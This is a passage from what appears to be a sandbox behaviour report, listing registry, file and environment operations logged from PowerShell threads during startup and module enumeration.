| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, size = 4096, size_out = 4096 |
|
51 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, size = 4096, size_out = 2970 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, size = 102, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, type = file_attributes |
|
3 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096 |
|
50 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 1668 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 380, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
3 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 1 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
3 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096 |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 266 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
3 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = USERPROFILE, result_out = C:\Users\Nd9E1FYi |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes |
|
3 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 |
Thread 0xccc
4
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0xe34
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0xe4c
2
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = PinnableBufferCache_System.Threading.OverlappedData_Disabled |
|
1 | |
| Environment | Get Environment String | name = PinnableBufferCache_System.Threading.OverlappedData_MinCount |
|
1 |
Thread 0xfa0
1128
3
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
2 | |
| Environment | Get Environment String | name = PATH |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| File | Get Info | filename = C:\ProgramData\Oracle\Java\javapath, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\ProgramData\Oracle\Java\javapath, type = file_attributes |
|
15 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
16 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
16 | |
| File | Get Info | filename = C:\Windows\System32\Wbem, type = file_attributes |
|
16 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\, type = file_attributes |
|
7 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AppBackgroundTask, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker\AppLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Appx, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Appx\Appx.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AssignedAccess, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BitLocker, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BitLocker\BitLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BranchCache, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BranchCache\BranchCache.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Dism, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Dism\Dism.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\DnsClient, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\DnsClient\DnsClient.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\EventTracingManagement, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\EventTracingManagement\EventTracingManagement.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\International, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\International\International.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\iSCSI, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\iSCSI\iSCSI.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\ISE, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\ISE\ISE.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Kds, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Kds\Kds.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Diagnostics, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Host, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.WSMan.Management, type = file_attributes |
|
1 | |
